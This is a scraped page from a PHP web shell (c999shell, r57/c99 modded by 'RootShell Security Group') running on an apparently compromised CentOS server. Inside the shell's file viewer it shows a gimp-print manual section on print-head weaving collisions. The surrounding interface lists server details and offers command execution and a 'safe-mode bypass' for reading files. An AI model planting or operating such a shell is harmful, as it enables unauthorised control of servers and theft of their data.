Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/share/gimp-print/doc/manual-html/ drwxr-xr-x |
Viewing file: gimpprint_31.html (2.15 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
B.2.3 Weaving collisionsThis perfect weave is not possible in all cases. Let's look at another example: @math{S=6}, @math{J=4}: 0 *-----*-----*-----* 1 *-----*-----*-----* 2 *-----*-----*-----* 3 *-----*-----*-----* 4 ^ *-^---*-----*-----* 5 | ^ | *-^---*-----*-----* OUCH! ^ | ^ | | Here we have a collision. Some lines printed in later passes overprint lines printed by earlier passes. We can see why by considering which row number is printed by a given jet number @math{j} (numbered from 0) of a given pass, @math{p}: @math{row(p, j) = p*J + j*S} Because @math{J=4} and @math{S=6} have a common factor of 2, jet 2 of pass 0 prints the same row as jet 0 of pass 3: @math{row(0, 2) = 0*4 + 2*6 = 12} @math{row(3, 0) = 3*4 + 0*6 = 12} In fact, with this particular weave pattern, jets 0 and 1 of pass @math{p+3} always overprint jets 2 and 3 of pass @math{p}. We'll represent overprinting rows by a `^' in our diagrams, and correct rows by `*': @math{S=6} @math{J=4}: 0 *-----*-----*-----* 1 *-----*-----*-----* 2 *-----*-----*-----* 3 ^-----^-----*-----* 4 ^-----^-----*-----* 5 ^-----^-----*-----* Go to the first, previous, next, last section, table of contents. |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0163 ]-- |